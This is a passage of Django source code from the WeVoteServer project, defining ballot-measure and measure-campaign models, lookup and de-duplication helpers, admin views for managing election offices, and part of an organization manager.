# ballot_placement: We store ballot_placement in the BallotItem table instead because it is different for each voter
# If this is a partisan election, the name of the party it is for.
primary_party = models.CharField(verbose_name="primary party", max_length=255, null=True, blank=True)
# The name of the district.
district_name = models.CharField(verbose_name="district name", max_length=255, null=False, blank=False)
# The geographic scope of this district. If unspecified the district's geography is not known.
# One of: national, statewide, congressional, stateUpper, stateLower, countywide, judicial, schoolBoard,
# cityWide, township, countyCouncil, cityCouncil, ward, special
district_scope = models.CharField(verbose_name="district scope", max_length=255, null=False, blank=False)
# An identifier for this district, relative to its scope. For example, the 34th State Senate district
# would have id "34" and a scope of stateUpper.
district_id = models.CharField(verbose_name="google civic district id", max_length=255, null=True, blank=True)
# State code
state_code = models.CharField(verbose_name="state this measure affects", max_length=2, null=True, blank=True)
wikipedia_page_id = models.BigIntegerField(verbose_name="pageid", null=True, blank=True)
wikipedia_page_title = models.CharField(
verbose_name="Page title on Wikipedia", max_length=255, null=True, blank=True)
wikipedia_photo_url = models.URLField(verbose_name='url of wikipedia logo', blank=True, null=True)
ballotpedia_page_title = models.CharField(
verbose_name="Page title on Ballotpedia", max_length=255, null=True, blank=True)
ballotpedia_photo_url = models.URLField(verbose_name='url of ballotpedia logo', blank=True, null=True)
def get_measure_state(self):
if positive_value_exists(self.state_code):
return self.state_code
# Pull this from ocdDivisionId
ocd_division_id = self.ocd_division_id
return extract_state_from_ocd_division_id(ocd_division_id)
# We override the save function so we can auto-generate we_vote_id
def save(self, *args, **kwargs):
# Even if this data came from another source we still need a unique we_vote_id
if self.we_vote_id:
self.we_vote_id = self.we_vote_id.strip().lower()
if self.we_vote_id == "" or self.we_vote_id is None: # If there isn't a value...
# ...generate a new id
site_unique_id_prefix = fetch_site_unique_id_prefix()
next_local_integer = fetch_next_we_vote_id_last_contest_measure_integer()
# "wv" = We Vote
# site_unique_id_prefix = a generated (or assigned) unique id for one server running We Vote
# "meas" = tells us this is a unique id for a ContestMeasure
# next_integer = a unique, sequential integer for this server - not necessarily tied to database id
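            # Example with hypothetical values: prefix "3v" and integer 123 produce "wv3vmeas123"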
self.we_vote_id = "wv{site_unique_id_prefix}meas{next_integer}".format(
site_unique_id_prefix=site_unique_id_prefix,
next_integer=next_local_integer,
)
super(ContestMeasure, self).save(*args, **kwargs)
# The campaign that is supporting this Measure. Equivalent to CandidateCampaign
class MeasureCampaign(models.Model):
# The we_vote_id identifier is unique across all We Vote sites, and allows us to share our data with other
# organizations
# It starts with "wv" then we add on a database specific identifier like "3v" (WeVoteSetting.site_unique_id_prefix)
# then the string "meascam", and then a sequential integer like "123".
# We keep the last value in WeVoteSetting.we_vote_id_last_measure_campaign_integer
we_vote_id = models.CharField(
verbose_name="we vote permanent id", max_length=255, default=None, null=True, blank=True, unique=True)
# contest_measure link
# The internal We Vote id for the ContestMeasure that this campaign taking a stance on
contest_measure_id = models.CharField(verbose_name="contest_measure unique id",
max_length=255, null=False, blank=False)
# Is the campaign attempting to pass the measure, or stop it from passing?
SUPPORT = 'S'
NEUTRAL = 'N'
OPPOSE = 'O'
STANCE_CHOICES = (
(SUPPORT, 'Support'),
(NEUTRAL, 'Neutral'),
(OPPOSE, 'Oppose'),
)
stance = models.CharField("stance", max_length=1, choices=STANCE_CHOICES, default=NEUTRAL)
# The candidate's name.
candidate_name = models.CharField(verbose_name="candidate name", max_length=255, null=False, blank=False)
# The full name of the party the candidate is a member of.
party = models.CharField(verbose_name="party", max_length=255, null=True, blank=True)
# A URL for a photo of the candidate.
photo_url = models.CharField(verbose_name="photoUrl", max_length=255, null=True, blank=True)
# The unique ID of the election containing this contest. (Provided by Google Civic)
google_civic_election_id = models.CharField(verbose_name="google election id",
max_length=255, null=False, blank=False)
    google_civic_election_id_new = models.PositiveIntegerField(
        verbose_name="google election id new", default=0, null=False, blank=False)
# The URL for the candidate's campaign web site.
url = models.URLField(verbose_name='website url of campaign', blank=True, null=True)
facebook_url = models.URLField(verbose_name='facebook url of campaign', blank=True, null=True)
twitter_url = models.URLField(verbose_name='twitter url of campaign', blank=True, null=True)
google_plus_url = models.URLField(verbose_name='google plus url of campaign', blank=True, null=True)
youtube_url = models.URLField(verbose_name='youtube url of campaign', blank=True, null=True)
# The email address for the candidate's campaign.
measure_email = models.CharField(verbose_name="measure email", max_length=255, null=True, blank=True)
# The voice phone number for the campaign office for this measure.
measure_phone = models.CharField(verbose_name="measure phone", max_length=255, null=True, blank=True)
# We override the save function so we can auto-generate we_vote_id
def save(self, *args, **kwargs):
# Even if this data came from another source we still need a unique we_vote_id
if self.we_vote_id:
self.we_vote_id = self.we_vote_id.strip().lower()
if self.we_vote_id == "" or self.we_vote_id is None: # If there isn't a value...
# ...generate a new id
site_unique_id_prefix = fetch_site_unique_id_prefix()
next_local_integer = fetch_next_we_vote_id_last_measure_campaign_integer()
# "wv" = We Vote
# site_unique_id_prefix = a generated (or assigned) unique id for one server running We Vote
# "meascam" = tells us this is a unique id for a MeasureCampaign
# next_integer = a unique, sequential integer for this server - not necessarily tied to database id
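            # Example with hypothetical values: prefix "3v" and integer 123 produce "wv3vmeascam123"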
self.we_vote_id = "wv{site_unique_id_prefix}meascam{next_integer}".format(
site_unique_id_prefix=site_unique_id_prefix,
next_integer=next_local_integer,
)
super(MeasureCampaign, self).save(*args, **kwargs)
class ContestMeasureManager(models.Model):
def __unicode__(self):
return "ContestMeasureManager"
def retrieve_contest_measure_from_id(self, contest_measure_id):
contest_measure_manager = ContestMeasureManager()
return contest_measure_manager.retrieve_contest_measure(contest_measure_id)
def retrieve_contest_measure_from_we_vote_id(self, contest_measure_we_vote_id):
contest_measure_id = 0
contest_measure_manager = ContestMeasureManager()
return contest_measure_manager.retrieve_contest_measure(contest_measure_id, contest_measure_we_vote_id)
def retrieve_contest_measure_from_maplight_id(self, maplight_id):
contest_measure_id = 0
contest_measure_we_vote_id = ''
contest_measure_manager = ContestMeasureManager()
return contest_measure_manager.retrieve_contest_measure(contest_measure_id, contest_measure_we_vote_id,
maplight_id)
def fetch_contest_measure_id_from_maplight_id(self, maplight_id):
contest_measure_id = 0
contest_measure_we_vote_id = ''
contest_measure_manager = ContestMeasureManager()
results = contest_measure_manager.retrieve_contest_measure(
contest_measure_id, contest_measure_we_vote_id, maplight_id)
if results['success']:
return results['contest_measure_id']
return 0
def fetch_contest_measure_we_vote_id_from_id(self, contest_measure_id):
contest_measure_we_vote_id = ''
maplight_id = ''
contest_measure_manager = ContestMeasureManager()
results = contest_measure_manager.retrieve_contest_measure(
contest_measure_id, contest_measure_we_vote_id, maplight_id)
if results['success']:
return results['contest_measure_we_vote_id']
        return ''
def update_or_create_contest_measure(self, we_vote_id, google_civic_election_id, measure_title,
district_id, district_name, state_code,
update_contest_measure_values):
"""
        Either update or create a measure entry.
"""
exception_multiple_object_returned = False
new_measure_created = False
proceed_to_update_or_save = True
success = False
status = 'ENTERING update_or_create_contest_measure'
contest_measure_on_stage = ContestMeasure()
if positive_value_exists(we_vote_id):
# If here we are dealing with an existing measure
pass
else:
# If here, we are dealing with a measure that is new to We Vote
if not (district_id or district_name):
success = False
status = 'MISSING_DISTRICT_ID-MEASURE_UPDATE_OR_CREATE'
proceed_to_update_or_save = False
elif not state_code:
success = False
status = 'MISSING_STATE_CODE-MEASURE_UPDATE_OR_CREATE'
proceed_to_update_or_save = False
elif not measure_title:
success = False
status = 'MISSING_MEASURE_TITLE-MEASURE_UPDATE_OR_CREATE'
proceed_to_update_or_save = False
if not google_civic_election_id:
success = False
status = 'MISSING_GOOGLE_CIVIC_ELECTION_ID-MEASURE_UPDATE_OR_CREATE'
proceed_to_update_or_save = False
if proceed_to_update_or_save:
# We need to use one set of values when we are creating an entry, and another set of values when we
# are updating an entry
try:
                # Use get_or_create with create_contest_measure_values. It will be more elegant and less prone
                # to problems.
                # If a contest_measure_on_stage is found, *then* update it with update_contest_measure_values
if positive_value_exists(we_vote_id):
contest_measure_on_stage, new_measure_created = ContestMeasure.objects.update_or_create(
google_civic_election_id__exact=google_civic_election_id,
we_vote_id__iexact=we_vote_id,
defaults=update_contest_measure_values)
else:
contest_measure_on_stage, new_measure_created = ContestMeasure.objects.update_or_create(
google_civic_election_id__exact=google_civic_election_id,
district_id__exact=district_id,
district_name__iexact=district_name, # Case doesn't matter
measure_title__iexact=measure_title, # Case doesn't matter
state_code__iexact=state_code, # Case doesn't matter
defaults=update_contest_measure_values)
success = True
status = 'CONTEST_MEASURE_SAVED'
except ContestMeasure.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger=logger)
success = False
status = 'MULTIPLE_MATCHING_CONTEST_MEASURES_FOUND'
exception_multiple_object_returned = True
results = {
'success': success,
'status': status,
'MultipleObjectsReturned': exception_multiple_object_returned,
'new_measure_created': new_measure_created,
'contest_measure': contest_measure_on_stage,
'saved': new_measure_created,
'updated': True if success and not new_measure_created else False,
'not_processed': True if not success else False,
}
return results
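# Hedged usage sketch for update_or_create_contest_measure; the argument values and
# the field name inside update_contest_measure_values are illustrative, not from the
# original source:
#   manager = ContestMeasureManager()
#   results = manager.update_or_create_contest_measure(
#       we_vote_id='', google_civic_election_id=4162, measure_title='Measure AA',
#       district_id='123', district_name='Alameda County', state_code='CA',
#       update_contest_measure_values={'measure_subtitle': 'Affordable housing bond'})
#   if results['new_measure_created']:
#       pass  # a brand new ContestMeasure row was saved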
# NOTE: searching by all other variables seems to return a list of objects
def retrieve_contest_measure(self, contest_measure_id, contest_measure_we_vote_id='', maplight_id=None):
error_result = False
exception_does_not_exist = False
exception_multiple_object_returned = False
contest_measure_on_stage = ContestMeasure()
try:
if positive_value_exists(contest_measure_id):
contest_measure_on_stage = ContestMeasure.objects.get(id=contest_measure_id)
contest_measure_id = contest_measure_on_stage.id
contest_measure_we_vote_id = contest_measure_on_stage.we_vote_id
status = "RETRIEVE_MEASURE_FOUND_BY_ID"
elif positive_value_exists(contest_measure_we_vote_id):
contest_measure_on_stage = ContestMeasure.objects.get(we_vote_id=contest_measure_we_vote_id)
contest_measure_id = contest_measure_on_stage.id
contest_measure_we_vote_id = contest_measure_on_stage.we_vote_id
status = "RETRIEVE_MEASURE_FOUND_BY_WE_VOTE_ID"
elif positive_value_exists(maplight_id):
contest_measure_on_stage = ContestMeasure.objects.get(maplight_id=maplight_id)
contest_measure_id = contest_measure_on_stage.id
contest_measure_we_vote_id = contest_measure_on_stage.we_vote_id
status = "RETRIEVE_MEASURE_FOUND_BY_MAPLIGHT_ID"
else:
status = "RETRIEVE_MEASURE_SEARCH_INDEX_MISSING"
except ContestMeasure.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger=logger)
exception_multiple_object_returned = True
status = "RETRIEVE_MEASURE_MULTIPLE_OBJECTS_RETURNED"
except ContestMeasure.DoesNotExist:
exception_does_not_exist = True
status = "RETRIEVE_MEASURE_NOT_FOUND"
results = {
'success': True if convert_to_int(contest_measure_id) > 0 else False,
'status': status,
'error_result': error_result,
'DoesNotExist': exception_does_not_exist,
'MultipleObjectsReturned': exception_multiple_object_returned,
'contest_measure_found': True if convert_to_int(contest_measure_id) > 0 else False,
'contest_measure_id': convert_to_int(contest_measure_id),
'contest_measure_we_vote_id': contest_measure_we_vote_id,
'contest_measure': contest_measure_on_stage,
}
return results
def fetch_contest_measure_id_from_we_vote_id(self, contest_measure_we_vote_id):
"""
Take in contest_measure_we_vote_id and return internal/local-to-this-database contest_measure_id
:param contest_measure_we_vote_id:
:return:
"""
contest_measure_id = 0
try:
if positive_value_exists(contest_measure_we_vote_id):
contest_measure_on_stage = ContestMeasure.objects.get(we_vote_id=contest_measure_we_vote_id)
contest_measure_id = contest_measure_on_stage.id
except ContestMeasure.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger=logger)
except ContestMeasure.DoesNotExist:
contest_measure_id = 0
return contest_measure_id
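# Hedged usage sketch (the we_vote_id value is illustrative):
#   ContestMeasureManager().fetch_contest_measure_id_from_we_vote_id('wv3vmeascam123')
#   # -> the local integer id, or 0 when no match is found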
class ContestMeasureList(models.Model):
"""
This is a class to make it easy to retrieve lists of Measures
"""
def __unicode__(self):
return "ContestMeasureList"
def retrieve_all_measures_for_upcoming_election(self, google_civic_election_id=0,
return_list_of_objects=False):
measure_list_objects = []
measure_list_light = []
measure_list_found = False
try:
measure_queryset = ContestMeasure.objects.all()
if positive_value_exists(google_civic_election_id):
measure_queryset = measure_queryset.filter(google_civic_election_id=google_civic_election_id)
else:
# TODO Limit this search to upcoming_elections only
pass
# We never expect more than 300 measures for one election
measure_list_objects = measure_queryset[:300]
if len(measure_list_objects):
measure_list_found = True
status = 'MEASURES_RETRIEVED'
success = True
else:
status = 'NO_MEASURES_RETRIEVED'
success = True
except ContestMeasure.DoesNotExist:
# No measures found. Not a problem.
status = 'NO_MEASURES_FOUND_DoesNotExist'
measure_list_objects = []
success = True
except Exception as e:
handle_exception(e, logger=logger)
status = 'FAILED retrieve_all_measures_for_upcoming_election ' \
'{error} [type: {error_type}]'.format(error=e, error_type=type(e))
success = False
if measure_list_found:
for measure in measure_list_objects:
one_measure = {
'ballot_item_display_name': measure.measure_title,
'measure_we_vote_id': measure.we_vote_id,
'office_we_vote_id': '',
'candidate_we_vote_id': '',
}
measure_list_light.append(one_measure.copy())
results = {
'success': success,
'status': status,
'google_civic_election_id': google_civic_election_id,
'measure_list_found': measure_list_found,
'measure_list_objects': measure_list_objects if return_list_of_objects else [],
'measure_list_light': measure_list_light,
}
return results
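# Hedged sketch of how the "light" list is typically consumed (election id illustrative):
#   results = ContestMeasureList().retrieve_all_measures_for_upcoming_election(4162)
#   if results['measure_list_found']:
#       for measure in results['measure_list_light']:
#           print(measure['ballot_item_display_name'], measure['measure_we_vote_id'])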
def retrieve_possible_duplicate_measures(self, measure_title, google_civic_election_id, measure_url, maplight_id,
vote_smart_id,
we_vote_id_from_master=''):
measure_list_objects = []
filters = []
measure_list_found = False
try:
measure_queryset = ContestMeasure.objects.all()
measure_queryset = measure_queryset.filter(google_civic_election_id=google_civic_election_id)
# We don't look for office_we_vote_id because of the chance that locally we are using a
# different we_vote_id
# measure_queryset = measure_queryset.filter(contest_office_we_vote_id__iexact=office_we_vote_id)
# Ignore entries with we_vote_id coming in from master server
if positive_value_exists(we_vote_id_from_master):
measure_queryset = measure_queryset.filter(~Q(we_vote_id__iexact=we_vote_id_from_master))
# We want to find measures with *any* of these values
if positive_value_exists(measure_title):
new_filter = Q(measure_title__iexact=measure_title)
filters.append(new_filter)
if positive_value_exists(measure_url):
new_filter = Q(measure_url__iexact=measure_url)
filters.append(new_filter)
if positive_value_exists(maplight_id):
new_filter = Q(maplight_id=maplight_id)
filters.append(new_filter)
if positive_value_exists(vote_smart_id):
new_filter = Q(vote_smart_id=vote_smart_id)
filters.append(new_filter)
# Add the first query
if len(filters):
final_filters = filters.pop()
# ...and "OR" the remaining items in the list
for item in filters:
final_filters |= item
measure_queryset = measure_queryset.filter(final_filters)
measure_list_objects = measure_queryset
if len(measure_list_objects):
measure_list_found = True
status = 'DUPLICATE_MEASURES_RETRIEVED'
success = True
else:
status = 'NO_DUPLICATE_MEASURES_RETRIEVED'
success = True
except ContestMeasure.DoesNotExist:
# No measures found. Not a problem.
status = 'NO_DUPLICATE_MEASURES_FOUND_DoesNotExist'
measure_list_objects = []
success = True
except Exception as e:
handle_exception(e, logger=logger)
status = 'FAILED retrieve_possible_duplicate_measures ' \
'{error} [type: {error_type}]'.format(error=e, error_type=type(e))
success = False
results = {
'success': success,
'status': status,
'google_civic_election_id': google_civic_election_id,
'measure_list_found': measure_list_found,
'measure_list': measure_list_objects,
}
return results
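# The pop-then-OR pattern above turns a list of Q objects into one "match any" filter.
# A minimal standalone sketch of the same technique (field values illustrative):
#   from django.db.models import Q
#   filters = [Q(measure_title__iexact='Measure AA'), Q(maplight_id=42)]
#   final_filters = filters.pop()
#   for item in filters:
#       final_filters |= item
#   ContestMeasure.objects.filter(final_filters)  # OR of all the conditions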
```
#### File: WeVoteServer/office/views_admin.py
```python
from .controllers import offices_import_from_master_server
from .models import ContestOffice
from .serializers import ContestOfficeSerializer
from admin_tools.views import redirect_to_sign_in_page
from candidate.models import CandidateCampaign, fetch_candidate_count_for_office
from django.http import HttpResponseRedirect
from django.core.urlresolvers import reverse
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.contrib.messages import get_messages
from django.shortcuts import render
from election.models import Election, ElectionManager
from exception.models import handle_record_found_more_than_one_exception,\
handle_record_not_found_exception, handle_record_not_saved_exception
from office.models import ContestOfficeListManager
from rest_framework.views import APIView
from rest_framework.response import Response
from voter.models import voter_has_authority
import wevote_functions.admin
from wevote_functions.functions import convert_to_int, positive_value_exists
logger = wevote_functions.admin.get_logger(__name__)
# This page does not need to be protected.
# NOTE: @login_required() throws an error. Needs to be figured out if we ever want to secure this page.
class OfficesSyncOutView(APIView):
def get(self, request, format=None):
google_civic_election_id = convert_to_int(request.GET.get('google_civic_election_id', 0))
contest_office_list = ContestOffice.objects.all()
if positive_value_exists(google_civic_election_id):
contest_office_list = contest_office_list.filter(google_civic_election_id=google_civic_election_id)
serializer = ContestOfficeSerializer(contest_office_list, many=True)
return Response(serializer.data)
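# Hedged usage sketch: this view serializes every ContestOffice, optionally scoped to
# one election, for consumption by another We Vote server. The URL path below is an
# assumption for illustration, not taken from the project's urls.py:
#   GET /apis/v1/officesSyncOut/?google_civic_election_id=4162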
@login_required
def offices_import_from_master_server_view(request):
google_civic_election_id = convert_to_int(request.GET.get('google_civic_election_id', 0))
state_code = request.GET.get('state_code', '')
results = offices_import_from_master_server(request, google_civic_election_id)
if not results['success']:
messages.add_message(request, messages.ERROR, results['status'])
else:
messages.add_message(request, messages.INFO, 'Offices import completed. '
'Saved: {saved}, Updated: {updated}, '
'Master data not imported (local duplicates found): '
'{duplicates_removed}, '
'Not processed: {not_processed}'
''.format(saved=results['saved'],
updated=results['updated'],
duplicates_removed=results['duplicates_removed'],
not_processed=results['not_processed']))
return HttpResponseRedirect(reverse('admin_tools:sync_dashboard', args=()) + "?google_civic_election_id=" +
str(google_civic_election_id) + "&state_code=" + str(state_code))
@login_required
def office_list_view(request):
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
messages_on_stage = get_messages(request)
google_civic_election_id = convert_to_int(request.GET.get('google_civic_election_id', 0))
office_list_manager = ContestOfficeListManager()
updated_office_list = []
results = office_list_manager.retrieve_all_offices_for_upcoming_election(google_civic_election_id, True)
if results['office_list_found']:
office_list = results['office_list_objects']
for office in office_list:
office.candidate_count = fetch_candidate_count_for_office(office.id)
updated_office_list.append(office)
election_list = Election.objects.order_by('-election_day_text')
template_values = {
'messages_on_stage': messages_on_stage,
'office_list': updated_office_list,
'election_list': election_list,
'google_civic_election_id': google_civic_election_id,
}
return render(request, 'office/office_list.html', template_values)
@login_required
def office_new_view(request):
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
google_civic_election_id = request.GET.get('google_civic_election_id', 0)
office_list_manager = ContestOfficeListManager()
updated_office_list = []
results = office_list_manager.retrieve_all_offices_for_upcoming_election(google_civic_election_id, True)
if results['office_list_found']:
office_list = results['office_list_objects']
for office in office_list:
office.candidate_count = fetch_candidate_count_for_office(office.id)
updated_office_list.append(office)
messages_on_stage = get_messages(request)
template_values = {
'messages_on_stage': messages_on_stage,
'google_civic_election_id': google_civic_election_id,
'office_list': updated_office_list,
}
return render(request, 'office/office_edit.html', template_values)
@login_required
def office_edit_view(request, office_id):
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
messages_on_stage = get_messages(request)
office_id = convert_to_int(office_id)
google_civic_election_id = request.GET.get('google_civic_election_id', 0)
office_on_stage_found = False
try:
office_on_stage = ContestOffice.objects.get(id=office_id)
office_on_stage_found = True
except ContestOffice.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger=logger)
except ContestOffice.DoesNotExist:
# This is fine, create new
pass
if office_on_stage_found:
template_values = {
'messages_on_stage': messages_on_stage,
'office': office_on_stage,
'google_civic_election_id': google_civic_election_id,
}
else:
template_values = {
'messages_on_stage': messages_on_stage,
'google_civic_election_id': google_civic_election_id,
}
return render(request, 'office/office_edit.html', template_values)
@login_required
def office_edit_process_view(request):
"""
Process the new or edit office forms
:param request:
:return:
"""
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
office_id = convert_to_int(request.POST.get('office_id', 0))
office_name = request.POST.get('office_name', False)
google_civic_election_id = request.POST.get('google_civic_election_id', 0)
primary_party = request.POST.get('primary_party', False)
state_code = request.POST.get('state_code', False)
election_state = ''
if state_code is not False:
election_state = state_code
elif google_civic_election_id:
election_manager = ElectionManager()
results = election_manager.retrieve_election(google_civic_election_id)
if results['election_found']:
election = results['election']
election_state = election.get_election_state()
# Check to see if this office is already in the database
office_on_stage_found = False
try:
office_query = ContestOffice.objects.filter(id=office_id)
if len(office_query):
office_on_stage = office_query[0]
office_on_stage_found = True
except Exception as e:
handle_record_not_found_exception(e, logger=logger)
try:
if office_on_stage_found:
# Update
# Removed for now: convert_to_int(office_on_stage.google_civic_election_id) >= 1000000 and
if office_name is not False:
office_on_stage.office_name = office_name
if primary_party is not False:
office_on_stage.primary_party = primary_party
if positive_value_exists(election_state):
office_on_stage.state_code = election_state
office_on_stage.save()
messages.add_message(request, messages.INFO, 'Office updated.')
google_civic_election_id = office_on_stage.google_civic_election_id
return HttpResponseRedirect(reverse('office:office_list', args=()) +
"?google_civic_election_id=" + google_civic_election_id)
else:
# Create new
office_on_stage = ContestOffice(
office_name=office_name,
google_civic_election_id=google_civic_election_id,
state_code=election_state,
)
# Removing this limitation: convert_to_int(office_on_stage.google_civic_election_id) >= 1000000 and
if primary_party is not False:
office_on_stage.primary_party = primary_party
office_on_stage.save()
messages.add_message(request, messages.INFO, 'New office saved.')
# Come back to the "Create New Office" page
return HttpResponseRedirect(reverse('office:office_new', args=()) +
"?google_civic_election_id=" + google_civic_election_id)
except Exception as e:
handle_record_not_saved_exception(e, logger=logger)
messages.add_message(request, messages.ERROR, 'Could not save office.')
return HttpResponseRedirect(reverse('office:office_list', args=()) +
"?google_civic_election_id=" + google_civic_election_id)
@login_required
def office_summary_view(request, office_id):
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
messages_on_stage = get_messages(request)
office_id = convert_to_int(office_id)
office_on_stage_found = False
google_civic_election_id = convert_to_int(request.GET.get('google_civic_election_id', 0))
try:
office_on_stage = ContestOffice.objects.get(id=office_id)
office_on_stage_found = True
google_civic_election_id = office_on_stage.google_civic_election_id
except ContestOffice.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger=logger)
except ContestOffice.DoesNotExist:
# This is fine, create new
pass
candidate_list = []
try:
candidate_list = CandidateCampaign.objects.filter(contest_office_id=office_id)
if positive_value_exists(google_civic_election_id):
candidate_list = candidate_list.filter(google_civic_election_id=google_civic_election_id)
candidate_list = candidate_list.order_by('candidate_name')
except CandidateCampaign.DoesNotExist:
# This is fine, create new
pass
election_list = Election.objects.order_by('-election_day_text')
if office_on_stage_found:
template_values = {
'messages_on_stage': messages_on_stage,
'office': office_on_stage,
'candidate_list': candidate_list,
'election_list': election_list,
'google_civic_election_id': google_civic_election_id,
}
else:
template_values = {
'messages_on_stage': messages_on_stage,
}
return render(request, 'office/office_summary.html', template_values)
@login_required
def office_delete_process_view(request):
authority_required = {'verified_volunteer'} # admin, verified_volunteer
if not voter_has_authority(request, authority_required):
return redirect_to_sign_in_page(request, authority_required)
office_id = convert_to_int(request.GET.get('office_id', 0))
google_civic_election_id = convert_to_int(request.GET.get('google_civic_election_id', 0))
office_on_stage_found = False
office_on_stage = ContestOffice()
try:
office_on_stage = ContestOffice.objects.get(id=office_id)
office_on_stage_found = True
google_civic_election_id = office_on_stage.google_civic_election_id
except ContestOffice.MultipleObjectsReturned as e:
    handle_record_found_more_than_one_exception(e, logger=logger)
except ContestOffice.DoesNotExist:
pass
candidates_found_for_this_office = False
if office_on_stage_found:
try:
candidate_list = CandidateCampaign.objects.filter(contest_office_id=office_id)
# if positive_value_exists(google_civic_election_id):
# candidate_list = candidate_list.filter(google_civic_election_id=google_civic_election_id)
candidate_list = candidate_list.order_by('candidate_name')
if len(candidate_list):
candidates_found_for_this_office = True
except CandidateCampaign.DoesNotExist:
pass
try:
if not candidates_found_for_this_office:
# Delete the office
office_on_stage.delete()
messages.add_message(request, messages.INFO, 'Office deleted.')
else:
messages.add_message(request, messages.ERROR, 'Could not delete -- '
'candidates still attached to this office.')
return HttpResponseRedirect(reverse('office:office_summary', args=(office_id,)))
except Exception as e:
messages.add_message(request, messages.ERROR, 'Could not delete office -- exception.')
return HttpResponseRedirect(reverse('office:office_summary', args=(office_id,)))
return HttpResponseRedirect(reverse('office:office_list', args=()) +
"?google_civic_election_id=" + str(google_civic_election_id))
```
#### File: WeVoteServer/organization/models.py
```python
from django.db import models
from django.db.models import Q
from exception.models import handle_exception, \
handle_record_found_more_than_one_exception, handle_record_not_saved_exception
from import_export_twitter.functions import retrieve_twitter_user_info
import wevote_functions.admin
from wevote_functions.functions import convert_to_int, extract_twitter_handle_from_text_string, positive_value_exists
from wevote_settings.models import fetch_next_we_vote_id_last_org_integer, fetch_site_unique_id_prefix
logger = wevote_functions.admin.get_logger(__name__)
class OrganizationManager(models.Manager):
"""
A class for working with the Organization model
"""
def create_organization_simple(self, organization_name, organization_website, organization_twitter_handle,
organization_email='', organization_facebook='', organization_image=''):
try:
organization = self.create(organization_name=organization_name,
organization_website=organization_website,
organization_twitter_handle=organization_twitter_handle,
organization_email=organization_email,
organization_facebook=organization_facebook,
organization_image=organization_image)
except Exception as e:
handle_record_not_saved_exception(e, logger=logger)
organization = Organization()
return organization
def create_organization(self, organization_name, organization_website, organization_twitter_handle,
organization_email='', organization_facebook='', organization_image=''):
try:
organization = self.create(organization_name=organization_name,
organization_website=organization_website,
organization_twitter_handle=organization_twitter_handle,
organization_email=organization_email,
organization_facebook=organization_facebook,
organization_image=organization_image)
status = "CREATE_ORGANIZATION_SUCCESSFUL"
success = True
except Exception as e:
handle_record_not_saved_exception(e, logger=logger)
organization = Organization()
status = "CREATE_ORGANIZATION_FAILED"
success = False
results = {
'success': success,
'status': status,
'organization': organization,
}
return results
def retrieve_organization_from_id(self, organization_id):
return self.retrieve_organization(organization_id)
def retrieve_organization_from_we_vote_id(self, organization_we_vote_id):
return self.retrieve_organization(0, organization_we_vote_id)
def retrieve_organization_from_vote_smart_id(self, vote_smart_id):
return self.retrieve_organization(0, '', vote_smart_id)
def retrieve_organization(self, organization_id, we_vote_id=None, vote_smart_id=None):
error_result = False
exception_does_not_exist = False
exception_multiple_object_returned = False
organization_on_stage = Organization()
organization_on_stage_id = 0
status = "ERROR_ENTERING_RETRIEVE_ORGANIZATION"
try:
if positive_value_exists(organization_id):
status = "ERROR_RETRIEVING_ORGANIZATION_WITH_ID"
organization_on_stage = Organization.objects.get(id=organization_id)
organization_on_stage_id = organization_on_stage.id
status = "ORGANIZATION_FOUND_WITH_ID"
elif positive_value_exists(we_vote_id):
status = "ERROR_RETRIEVING_ORGANIZATION_WITH_WE_VOTE_ID"
organization_on_stage = Organization.objects.get(we_vote_id=we_vote_id)
organization_on_stage_id = organization_on_stage.id
status = "ORGANIZATION_FOUND_WITH_WE_VOTE_ID"
elif positive_value_exists(vote_smart_id):
status = "ERROR_RETRIEVING_ORGANIZATION_WITH_VOTE_SMART_ID"
organization_on_stage = Organization.objects.get(vote_smart_id=vote_smart_id)
organization_on_stage_id = organization_on_stage.id
status = "ORGANIZATION_FOUND_WITH_VOTE_SMART_ID"
except Organization.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger)
error_result = True
exception_multiple_object_returned = True
status = "ERROR_MORE_THAN_ONE_ORGANIZATION_FOUND"
# logger.warn("Organization.MultipleObjectsReturned")
except Organization.DoesNotExist:
error_result = True
exception_does_not_exist = True
status += ", ORGANIZATION_NOT_FOUND"
# logger.warn("Organization.DoesNotExist")
organization_on_stage_found = True if organization_on_stage_id > 0 else False
results = {
'success': True if organization_on_stage_found else False,
'status': status,
'organization_found': organization_on_stage_found,
'organization_id':
organization_on_stage.id if organization_on_stage.id else organization_on_stage_id,
'we_vote_id':
organization_on_stage.we_vote_id if organization_on_stage.we_vote_id else we_vote_id,
'organization': organization_on_stage,
'error_result': error_result,
'DoesNotExist': exception_does_not_exist,
'MultipleObjectsReturned': exception_multiple_object_returned,
}
return results
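# Hedged usage sketch of the three lookup paths above (the id values are illustrative):
#   manager = OrganizationManager()
#   manager.retrieve_organization(5)                 # by local database id
#   manager.retrieve_organization(0, 'wv3vorg123')   # by we_vote_id
#   manager.retrieve_organization(0, '', 1418)       # by vote_smart_id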
def fetch_organization_id(self, we_vote_id):
organization_id = 0
if positive_value_exists(we_vote_id):
organization_manager = OrganizationManager()
results = organization_manager.retrieve_organization(organization_id, we_vote_id)
if results['success']:
return results['organization_id']
return 0
def fetch_we_vote_id_from_local_id(self, organization_id):
if positive_value_exists(organization_id):
results = self.retrieve_organization(organization_id)
if results['organization_found']:
organization = results['organization']
return organization.we_vote_id
else:
return ''
else:
return ''
# We can use any of these four unique identifiers:
# organization.id, we_vote_id, organization_website, organization_twitter_handle
# Pass in the value if we want it saved. Pass in "False" if we want to leave it the same.
def update_or_create_organization(self, organization_id, we_vote_id,
organization_website_search, organization_twitter_search,
organization_name=False, organization_website=False,
